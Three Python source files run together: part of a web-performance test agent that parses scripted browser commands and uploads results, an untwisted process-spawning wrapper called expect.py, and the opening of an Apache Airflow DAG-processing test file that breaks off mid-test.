if 'headers' not in task:
task['headers'] = {}
task['headers'][name] = header_value
elif command == 'overridehost':
if target and value:
if 'overrideHosts' not in task:
task['overrideHosts'] = {}
task['overrideHosts'][target] = value
elif command == 'setcookie' and target is not None and value is not None:
url = target
cookie = value
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
cookie_name = cookie[:pos].strip()
cookie_value = cookie[pos+1:].strip()
if len(cookie_name) and len(cookie_value) and len(url):
if 'cookies' not in task:
task['cookies'] = []
task['cookies'].append({'url': url,
'name': cookie_name,
'value': cookie_value})
# commands that get pre-processed
elif command == 'setuseragent' and target is not None:
job['uastring'] = target
elif command == 'setbrowsersize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
dpr = float(job['dpr']) if 'dpr' in job else 1.0
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = int(float(width) / dpr)
job['height'] = int(float(height) / dpr)
elif command == 'setviewportsize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = width
job['height'] = height
# Adjust the viewport for non-mobile tests
if 'mobile' not in job or not job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
job['width'] += \
max(self.margins[job['browser']]['width'], 0)
job['height'] += \
max(self.margins[job['browser']]['height'], 0)
else:
job['adjust_viewport'] = True
elif command == 'setdevicescalefactor' and target is not None:
keep = False
job['dpr'] = target
elif command == 'settimeout':
keep = False
if target is not None:
time_limit = int(re.search(r'\d+', str(target)).group())
if time_limit > 0 and time_limit < 1200:
job['timeout'] = time_limit
elif command == 'blockdomains':
keep = False
if target is not None:
if 'block_domains' not in task:
task['block_domains'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = re.split('[, ]', target)
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
elif command == 'blockdomainsexcept':
keep = False
if target is not None:
if 'block_domains_except' not in task:
task['block_domains_except'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = target.split()
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains_except'].append(domain)
task['host_rules'].append(
'"MAP * 127.0.0.1, EXCLUDE {0}"'.format(domain))
elif command == 'block':
keep = False
if target is not None:
block_list = target.split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
elif command == 'setdns':
keep = False
if target is not None and value is not None and len(target) and len(value):
if target.find('"') == -1 and value.find('"') == -1:
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, value))
elif command == 'setdnsname':
# Resolve the IP and treat it like a setdns command
keep = False
if target is not None and value is not None and len(target) and len(value):
addr = None
try:
result = socket.getaddrinfo(value, 80)
if result and len(result) > 0:
for entry in result:
if entry and len(entry) >= 5:
sockaddr = entry[4]
if sockaddr and len(sockaddr) >= 1:
addr = sockaddr[0]
break
except Exception:
pass
if addr is not None and target.find('"') == -1:
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, addr))
# Commands that get translated into exec commands
elif command in ['click', 'selectvalue', 'sendclick', 'setinnerhtml',
'setinnertext', 'setvalue', 'submitform']:
if target is not None:
# convert the selector into a querySelector
separator = target.find('=')
if separator == -1:
separator = target.find("'")
if separator >= 0:
attribute = target[:separator]
attr_value = target[separator + 1:]
script = "document.querySelector('[{0}=\"{1}\"]')".format(\
attribute, attr_value)
if command in ['click', 'sendclick']:
script += '.click();'
elif command == 'submitform' and value is not None:
script += '.submit();'
record = True
elif command in ['setvalue', 'selectvalue'] and value is not None:
script += '.value="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnertext' and value is not None:
script += '.innerText="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnerhtml' and value is not None:
script += '.innerHTML="{0}";'.format(value.replace('"', '\\"'))
command = 'exec'
target = script
value = None
if keep:
if record:
record_count += 1
task['script'].append({'command': command,
'target': target,
'value': value,
'record': record})
elif 'url' in job:
if job['url'][:4] != 'http':
job['url'] = 'http://' + job['url']
record_count += 1
task['script'].append({'command': 'navigate', 'target': job['url'], 'record': True})
# Remove any spurious commands from the end of the script
pos = len(task['script']) - 1
while pos > 0:
if task['script'][pos]['record']:
break
task['script'].pop(pos)
pos -= 1
task['script_step_count'] = max(record_count, 1)
logging.debug(task['script'])
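    # Sketch of the translation above for a hypothetical one-line script
    # 'navigateAndWait<TAB>example.com': the 'andwait' suffix is stripped and
    # marks the step as recorded, the bare host gains an 'http://' prefix, and
    # task['script'] ends up as
    #   [{'command': 'navigate', 'target': 'http://example.com',
    #     'value': None, 'record': True}]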
def update_browser_viewport(self, task):
"""Update the browser border size based on the measured viewport"""
if 'actual_viewport' in task and 'width' in task and 'height' in task and \
self.job is not None and 'browser' in self.job:
browser = self.job['browser']
width = max(task['width'] - task['actual_viewport']['width'], 0)
height = max(task['height'] - task['actual_viewport']['height'], 0)
if browser not in self.margins or self.margins[browser]['width'] != width or \
self.margins[browser]['height'] != height:
self.margins[browser] = {"width": width, "height": height}
if not os.path.isdir(self.persistent_dir):
os.makedirs(self.persistent_dir)
margins_file = os.path.join(self.persistent_dir, 'margins.json')
with open(margins_file, 'wb') as f_out:
json.dump(self.margins, f_out)
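    # Worked example for the margin bookkeeping above (illustrative numbers):
    # if a window sized to 1024x768 reports an actual viewport of 1008x624,
    # the stored margin for that browser becomes {"width": 16, "height": 144},
    # and later runs add it back to the requested size so the viewport, not
    # the outer window, ends up at the size the test asked for.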
def body_fetch_thread(self):
"""background thread to fetch bodies"""
import requests
session = requests.session()
proxies = {"http": None, "https": None}
try:
while True:
task = self.fetch_queue.get_nowait()
try:
url = task['url']
dest = task['file']
headers = {}
if isinstance(task['headers'], list):
for header in task['headers']:
separator = header.find(':', 2)
if separator >= 0:
header_name = header[:separator].strip()
value = header[separator + 1:].strip()
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
elif isinstance(task['headers'], dict):
for header_name in task['headers']:
value = task['headers'][header_name]
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
logging.debug('Downloading %s to %s', url, dest)
response = session.get(url, headers=headers, stream=True,
timeout=30, proxies=proxies)
if response.status_code == 200:
with open(dest, 'wb') as f_out:
for chunk in response.iter_content(chunk_size=4096):
f_out.write(chunk)
self.fetch_result_queue.put(task)
except Exception:
pass
self.fetch_queue.task_done()
except Exception:
pass
def get_bodies(self, task):
"""Fetch any bodies that are missing if response bodies were requested"""
all_bodies = False
html_body = False
if 'bodies' in self.job and self.job['bodies']:
all_bodies = True
if 'htmlbody' in self.job and self.job['htmlbody']:
html_body = True
if not all_bodies and not html_body:
return
try:
path_base = os.path.join(task['dir'], task['prefix'])
path = os.path.join(task['dir'], 'bodies')
requests = []
devtools_file = os.path.join(task['dir'], task['prefix'] + '_devtools_requests.json.gz')
with gzip.open(devtools_file, 'rb') as f_in:
requests = json.load(f_in)
count = 0
bodies_zip = path_base + '_bodies.zip'
if requests and 'requests' in requests:
# See what bodies are already in the zip file
body_index = 0
bodies = []
try:
with zipfile.ZipFile(bodies_zip, 'r') as zip_file:
files = zip_file.namelist()
for filename in files:
matches = re.match(r'^(\d\d\d)-(.*)-body.txt$', filename)
if matches:
index = int(matches.group(1))
request_id = str(matches.group(2))
if index > body_index:
body_index = index
bodies.append(request_id)
except Exception:
pass
for request in requests['requests']:
if 'full_url' in request and \
'responseCode' in request \
and request['responseCode'] == 200 and \
request['full_url'].find('ocsp') == -1 and\
request['full_url'].find('.woff') == -1 and\
request['full_url'].find('.ttf') == -1 and\
'contentType' in request:
content_type = request['contentType'].lower()
need_body = False
if all_bodies:
if content_type.startswith('text/html') or \
content_type.find('javascript') >= 0 or \
content_type.find('json') >= 0:
need_body = True
elif html_body and content_type.startswith('text/html'):
need_body = True
html_body = False
if need_body:
body_id = str(request['id'])
if 'raw_id' in request:
body_id = str(request['raw_id'])
if body_id not in bodies:
count += 1
body_file_path = os.path.join(path, str(body_id))
headers = None
if 'headers' in request and 'request' in request['headers']:
headers = request['headers']['request']
task = {'url': request['full_url'],
'file': body_file_path,
'id': body_id,
'headers': headers}
if os.path.isfile(body_file_path):
self.fetch_result_queue.put(task)
else:
self.fetch_queue.put(task)
if count:
if not os.path.isdir(path):
os.makedirs(path)
logging.debug("Fetching bodies for %d requests", count)
threads = []
thread_count = min(count, 10)
for _ in xrange(thread_count):
thread = threading.Thread(target=self.body_fetch_thread)
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join(timeout=120)
# Build a list of files to add to the zip archive
bodies = []
try:
while True:
task = self.fetch_result_queue.get_nowait()
if os.path.isfile(task['file']):
# check to see if it is text or utf-8 data
try:
data = ''
with open(task['file'], 'rb') as f_in:
data = f_in.read()
json.loads('"' + data.replace('"', '\\"') + '"')
body_index += 1
file_name = '{0:03d}-{1}-body.txt'.format(body_index, task['id'])
bodies.append({'name': file_name, 'file': task['file']})
except Exception:
pass
self.fetch_result_queue.task_done()
except Exception:
pass
# Add the files
if bodies:
with zipfile.ZipFile(bodies_zip, 'a', zipfile.ZIP_DEFLATED) as zip_file:
for body in bodies:
zip_file.write(body['file'], body['name'])
except Exception:
pass
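    # Bodies collected above are stored in '<prefix>_bodies.zip' as entries
    # named 'NNN-<request id>-body.txt' (e.g. '004-1234.56-body.txt', the id
    # shown only as an illustration); the scan at the top of get_bodies()
    # matches the same pattern to skip bodies that were already captured.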
def upload_task_result(self, task):
"""Upload the result of an individual test run"""
logging.info('Uploading result')
cpu_pct = None
self.update_browser_viewport(task)
self.get_bodies(task)
# Stop logging to the file
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'debug_log' in task and os.path.isfile(task['debug_log']):
debug_out = task['debug_log'] + '.gz'
with open(task['debug_log'], 'rb') as f_in:
with gzip.open(debug_out, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(task['debug_log'])
except Exception:
pass
if 'page_data' in task and 'fullyLoadedCPUpct' in task['page_data']:
cpu_pct = task['page_data']['fullyLoadedCPUpct']
data = {'id': task['id'],
'location': self.location,
'run': str(task['run']),
'cached': str(task['cached']),
'pc': self.pc_name}
if self.key is not None:
data['key'] = self.key
if self.instance_id is not None:
data['ec2'] = self.instance_id
if self.zone is not None:
data['ec2zone'] = self.zone
needs_zip = []
zip_path = None
if os.path.isdir(task['dir']):
# upload any video images
if bool(self.job['video']) and len(task['video_directories']):
for video_subdirectory in task['video_directories']:
video_dir = os.path.join(task['dir'], video_subdirectory)
if os.path.isdir(video_dir):
for filename in os.listdir(video_dir):
filepath = os.path.join(video_dir, filename)
if os.path.isfile(filepath):
name = video_subdirectory + '/' + filename
if os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data,
filepath, task['prefix'] + '_' + filename):
os.remove(filepath)
else:
needs_zip.append({'path': filepath, 'name': name})
else:
needs_zip.append({'path': filepath, 'name': name})
# Upload the separate large files (> 100KB)
for filename in os.listdir(task['dir']):
filepath = os.path.join(task['dir'], filename)
if os.path.isfile(filepath):
# Delete any video files that may have squeaked by
if not self.job['keepvideo'] and filename[-4:] == '.mp4' and \
filename.find('rendered_video') == -1:
try:
os.remove(filepath)
except Exception:
pass
elif os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data, filepath, filename):
try:
os.remove(filepath)
except Exception:
pass
else:
needs_zip.append({'path': filepath, 'name': filename})
else:
needs_zip.append({'path': filepath, 'name': filename})
# Zip the remaining files
if len(needs_zip):
zip_path = os.path.join(task['dir'], "result.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_STORED) as zip_file:
for zipitem in needs_zip:
logging.debug('Storing %s (%d bytes)', zipitem['name'],
os.path.getsize(zipitem['path']))
zip_file.write(zipitem['path'], zipitem['name'])
try:
os.remove(zipitem['path'])
except Exception:
pass
# Post the workdone event for the task (with the zip attached)
if task['done']:
data['done'] = '1'
if task['error'] is not None:
data['error'] = task['error']
if cpu_pct is not None:
data['cpu'] = '{0:0.2f}'.format(cpu_pct)
logging.debug('Uploading result zip')
self.post_data(self.url + "workdone.php", data, zip_path, 'result.zip')
# Clean up so we don't leave directories lying around
if os.path.isdir(task['dir']):
try:
shutil.rmtree(task['dir'])
except Exception:
pass
if task['done'] and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
def post_data(self, url, data, file_path, filename):
"""Send a multi-part post"""
ret = True
# pass the data fields as query params and any files as post data
url += "?"
for key in data:
            if data[key] is not None:
url += key + '=' + urllib.quote_plus(data[key]) + '&'
logging.debug(url)
try:
if file_path is not None and os.path.isfile(file_path):
self.session.post(url,
files={'file':(filename, open(file_path, 'rb'))},
timeout=300,)
else:
self.session.post(url)
except Exception:
logging.exception("Upload Exception")
ret = False
return ret
|
expect.py
|
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
from queue import Queue
from untwisted.dispatcher import Dispatcher
from untwisted import core
from untwisted.event import LOAD, CLOSE
from untwisted.waker import waker
class ChildError(Exception):
pass
class ChildThread(Dispatcher):
SIZE = -1
def __init__(self, child):
self.child = child
self.thread = Thread(target=self.run)
self.queue = Queue()
self.terminate = self.child.terminate
core.gear.pool.append(self)
Dispatcher.__init__(self)
Thread.__init__(self)
self.thread.start()
def run(self):
"""
"""
while True:
data = self.read()
waker.wake_up()
if not data:
break
self.child.wait()
def update(self):
"""
"""
while not self.queue.empty():
self.dispatch()
def dispatch(self):
data = self.queue.get_nowait()
if not data:
self.drive(CLOSE)
else:
self.drive(LOAD, data)
def destroy(self):
"""
        Unregister from the untwisted reactor. Call self.terminate()
        first to kill the process.
"""
core.gear.pool.remove(self)
self.base.clear()
class ChildStdout(ChildThread):
"""
An event emitter to read data from a process stdout stream.
"""
def __init__(self, child):
if child.stdout is None:
raise ChildError('Child has no stdout!')
self.stdout = child.stdout
super(ChildStdout, self).__init__(child)
def read(self):
data = self.stdout.readline(self.SIZE)
self.queue.put_nowait(data)
return data
class ChildStderr(ChildThread):
"""
An event emitter to read data from a process stderr stream.
"""
def __init__(self, child):
if child.stderr is None:
raise ChildError('Child has no stderr!')
self.stderr = child.stderr
super(ChildStderr, self).__init__(child)
def read(self):
data = self.stderr.readline(self.SIZE)
self.queue.put_nowait(data)
return data
class ChildStdin:
"""
A wrapper around a process stdin stream to dump data to an
underlying process.
"""
def __init__(self, child):
self.child = child
if child.stdin is None:
raise ChildError('Child has no stdin!')
def send(self, data):
"""
        Send data to the child process through its stdin.
"""
self.child.stdin.write(data)
self.child.stdin.flush()
class Expect(ChildStdout, ChildStdin):
"""
This class is used to spawn processes.
python = Expect('python2.7', '-i')
python.send('print "hello world"')
python.terminate()
python.destroy()
"""
def __init__(self, *args):
"""
"""
child = Popen(args, stdout=PIPE,
stdin=PIPE, stderr=STDOUT)
self.args = args
self.stdin = child.stdin
self.stdout = child.stdout
super(Expect, self).__init__(child)
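# Minimal usage sketch. The handler names and the way they are bound to the
# LOAD / CLOSE events are assumptions -- the exact subscription call depends on
# the untwisted version in use, so only the events and methods defined in this
# module are taken as given:
#
#     def on_load(expect, data):
#         print('child said:', data)
#
#     def on_close(expect):
#         expect.terminate()
#         expect.destroy()
#
#     child = Expect('python', '-i')
#     # bind on_load to LOAD and on_close to CLOSE on `child`, send input with
#     # child.send(...), then start the untwisted reactor.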
|
test_dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import pathlib
import random
import socket
import sys
import threading
import unittest
from datetime import datetime, timedelta
from tempfile import TemporaryDirectory
from unittest import mock
from unittest.mock import MagicMock, PropertyMock
import pytest
from airflow.configuration import conf
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.jobs.scheduler_job import DagFileProcessorProcess
from airflow.models import DagBag, DagModel, TaskInstance as TI
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, TaskCallbackRequest
from airflow.utils.dag_processing import (
DagFileProcessorAgent,
DagFileProcessorManager,
DagFileStat,
DagParsingSignal,
DagParsingStat,
)
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.core.test_logging_config import SETTINGS_FILE_VALID, settings_context
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs, clear_db_serialized_dags
TEST_DAG_FOLDER = pathlib.Path(__file__).parent.parent / 'dags'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
class FakeDagFileProcessorRunner(DagFileProcessorProcess):
    # This fake processor will return the zombies it received in the constructor
    # as its processing result, without actually parsing anything.
def __init__(self, file_path, pickle_dags, dag_ids, callbacks):
super().__init__(file_path, pickle_dags, dag_ids, callbacks)
# We need a "real" selectable handle for waitable_handle to work
readable, writable = multiprocessing.Pipe(duplex=False)
writable.send('abc')
writable.close()
self._waitable_handle = readable
self._result = 0, 0
def start(self):
pass
@property
def start_time(self):
return DEFAULT_DATE
@property
def pid(self):
return 1234
@property
def done(self):
return True
@property
def result(self):
return self._result
@staticmethod
def _fake_dag_processor_factory(file_path, callbacks, dag_ids, pickle_dags):
return FakeDagFileProcessorRunner(
file_path,
pickle_dags,
dag_ids,
callbacks,
)
@property
def waitable_handle(self):
return self._waitable_handle
class TestDagFileProcessorManager(unittest.TestCase):
def setUp(self):
clear_db_runs()
def run_processor_manager_one_loop(self, manager, parent_pipe):
if not manager._async_mode:
parent_pipe.send(DagParsingSignal.AGENT_RUN_ONCE)
results = []
while True:
manager._run_parsing_loop()
while parent_pipe.poll(timeout=0.01):
obj = parent_pipe.recv()
if not isinstance(obj, DagParsingStat):
results.append(obj)
elif obj.done:
return results
raise RuntimeError("Shouldn't get here - nothing to read, but manager not finished!")
@conf_vars({('core', 'load_examples'): 'False'})
def test_max_runs_when_no_files(self):
child_pipe, parent_pipe = multiprocessing.Pipe()
with TemporaryDirectory(prefix="empty-airflow-dags-") as dags_folder:
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
manager = DagFileProcessorManager(
dag_directory=dags_folder,
max_runs=1,
processor_factory=FakeDagFileProcessorRunner._fake_dag_processor_factory,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
child_pipe.close()
parent_pipe.close()
@pytest.mark.backend("mysql", "postgres")
def test_start_new_processes_with_same_filepath(self):
"""
        Test that when a processor already exists for a filepath, a new processor won't be created
        for that filepath. The filepath will just be removed from the list.
"""
processor_factory_mock = MagicMock()
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=processor_factory_mock,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
file_1 = 'file_1.py'
file_2 = 'file_2.py'
file_3 = 'file_3.py'
manager._file_path_queue = [file_1, file_2, file_3]
# Mock that only one processor exists. This processor runs with 'file_1'
manager._processors[file_1] = MagicMock()
# Start New Processes
manager.start_new_processes()
        # Because of the config '[scheduler] parsing_processes = 2',
        # verify that only one extra process is created, and since a
        # processor for 'file_1' already exists (even though it is first
        # in '_file_path_queue'), the new processor is created for
        # 'file_2' and not 'file_1'.
processor_factory_mock.assert_called_once_with('file_2.py', [], [], False)
assert file_1 in manager._processors.keys()
assert file_2 in manager._processors.keys()
assert [file_3] == manager._file_path_queue
def test_set_file_paths_when_processor_file_path_not_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['missing_file.txt'] = mock_processor
manager._file_stats['missing_file.txt'] = DagFileStat(0, 0, None, None, 0)
manager.set_file_paths(['abc.txt'])
assert manager._processors == {}
def test_set_file_paths_when_processor_file_path_is_in_new_file_paths(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
mock_processor = MagicMock()
mock_processor.stop.side_effect = AttributeError('DagFileProcessor object has no attribute stop')
mock_processor.terminate.side_effect = None
manager._processors['abc.txt'] = mock_processor
manager.set_file_paths(['abc.txt'])
assert manager._processors == {'abc.txt': mock_processor}
@conf_vars({("scheduler", "file_parsing_sort_mode"): "alphabetical"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_alphabetically(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test dag files are sorted alphabetically"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_1.py', 'file_2.py', 'file_3.py', 'file_4.py']
@conf_vars({("scheduler", "file_parsing_sort_mode"): "random_seeded_by_host"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
def test_file_paths_in_queue_sorted_random_seeded_by_host(
self, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are randomly sorted and seeded by host name"""
dag_files = ["file_3.py", "file_2.py", "file_4.py", "file_1.py"]
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
expected_order = dag_files
random.Random(get_hostname()).shuffle(expected_order)
assert manager._file_path_queue == expected_order
# Verify running it again produces same order
manager._file_paths = []
manager.prepare_file_path_queue()
assert manager._file_path_queue == expected_order
@conf_vars({("scheduler", "file_parsing_sort_mode"): "modified_time"})
@mock.patch("zipfile.is_zipfile", return_value=True)
@mock.patch("airflow.utils.file.might_contain_dag", return_value=True)
@mock.patch("airflow.utils.file.find_path_from_directory", return_value=True)
@mock.patch("airflow.utils.file.os.path.isfile", return_value=True)
@mock.patch("airflow.utils.file.os.path.getmtime")
def test_file_paths_in_queue_sorted_by_modified_time(
self, mock_getmtime, mock_isfile, mock_find_path, mock_might_contain_dag, mock_zipfile
):
"""Test files are sorted by modified time"""
paths_with_mtime = {"file_3.py": 3.0, "file_2.py": 2.0, "file_4.py": 5.0, "file_1.py": 4.0}
dag_files = list(paths_with_mtime.keys())
mock_getmtime.side_effect = list(paths_with_mtime.values())
mock_find_path.return_value = dag_files
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
manager.set_file_paths(dag_files)
assert manager._file_path_queue == []
manager.prepare_file_path_queue()
assert manager._file_path_queue == ['file_4.py', 'file_1.py', 'file_3.py', 'file_2.py']
def test_find_zombies(self):
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta.max,
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
dagbag = DagBag(TEST_DAG_FOLDER, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('example_branch_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_first')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
ti.job_id = local_job.id
session.add(ti)
session.commit()
manager._last_zombie_query_time = timezone.utcnow() - timedelta(
seconds=manager._zombie_threshold_secs + 1
)
manager._find_zombies() # pylint: disable=no-value-for-parameter
requests = manager._callback_to_execute[dag.full_filepath]
assert 1 == len(requests)
assert requests[0].full_filepath == dag.full_filepath
assert requests[0].msg == "Detected as zombie"
assert requests[0].is_failure_callback is True
assert isinstance(requests[0].simple_task_instance, SimpleTaskInstance)
assert ti.dag_id == requests[0].simple_task_instance.dag_id
assert ti.task_id == requests[0].simple_task_instance.task_id
assert ti.execution_date == requests[0].simple_task_instance.execution_date
session.query(TI).delete()
session.query(LJ).delete()
def test_handle_failure_callback_with_zombies_are_correctly_passed_to_dag_file_processor(self):
"""
        Check that the same set of failure callback requests for zombies is passed to the dag
        file processors until the next zombie detection logic is invoked.
"""
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
with conf_vars({('scheduler', 'parsing_processes'): '1', ('core', 'load_examples'): 'False'}):
dagbag = DagBag(test_dag_path, read_dags_from_db=False)
with create_session() as session:
session.query(LJ).delete()
dag = dagbag.get_dag('test_example_bash_operator')
dag.sync_to_db()
task = dag.get_task(task_id='run_this_last')
ti = TI(task, DEFAULT_DATE, State.RUNNING)
local_job = LJ(ti)
local_job.state = State.SHUTDOWN
session.add(local_job)
session.commit()
# TODO: If there was an actual Relationship between TI and Job
# we wouldn't need this extra commit
session.add(ti)
ti.job_id = local_job.id
session.commit()
expected_failure_callback_requests = [
TaskCallbackRequest(
full_filepath=dag.full_filepath,
simple_task_instance=SimpleTaskInstance(ti),
msg="Message",
)
]
test_dag_path = TEST_DAG_FOLDER / 'test_example_bash_operator.py'
child_pipe, parent_pipe = multiprocessing.Pipe()
async_mode = 'sqlite' not in conf.get('core', 'sql_alchemy_conn')
fake_processors = []
def fake_processor_factory(*args, **kwargs):
nonlocal fake_processors
processor = FakeDagFileProcessorRunner._fake_dag_processor_factory(*args, **kwargs)
fake_processors.append(processor)
return processor
manager = DagFileProcessorManager(
dag_directory=test_dag_path,
max_runs=1,
processor_factory=fake_processor_factory,
processor_timeout=timedelta.max,
signal_conn=child_pipe,
dag_ids=[],
pickle_dags=False,
async_mode=async_mode,
)
self.run_processor_manager_one_loop(manager, parent_pipe)
if async_mode:
# Once for initial parse, and then again for the add_callback_to_queue
assert len(fake_processors) == 2
assert fake_processors[0]._file_path == str(test_dag_path)
assert fake_processors[0]._callback_requests == []
else:
assert len(fake_processors) == 1
assert fake_processors[-1]._file_path == str(test_dag_path)
callback_requests = fake_processors[-1]._callback_requests
assert {zombie.simple_task_instance.key for zombie in expected_failure_callback_requests} == {
result.simple_task_instance.key for result in callback_requests
}
child_pipe.close()
parent_pipe.close()
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.kill")
def test_kill_timed_out_processors_kill(self, mock_kill, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.min)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_kill.assert_called_once_with()
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess.pid", new_callable=PropertyMock)
@mock.patch("airflow.jobs.scheduler_job.DagFileProcessorProcess")
def test_kill_timed_out_processors_no_kill(self, mock_dag_file_processor, mock_pid):
mock_pid.return_value = 1234
manager = DagFileProcessorManager(
dag_directory='directory',
max_runs=1,
processor_factory=MagicMock().return_value,
processor_timeout=timedelta(seconds=5),
signal_conn=MagicMock(),
dag_ids=[],
pickle_dags=False,
async_mode=True,
)
processor = DagFileProcessorProcess('abc.txt', False, [], [])
processor._start_time = timezone.make_aware(datetime.max)
manager._processors = {'abc.txt': processor}
manager._kill_timed_out_processors()
mock_dag_file_processor.kill.assert_not_called()
@conf_vars({('core', 'load_examples'): 'False'})
@pytest.mark.execution_timeout(10)
def test_dag_with_system_exit(self):
"""
        Test to check that a DAG that calls sys.exit() doesn't break the scheduler.
"""
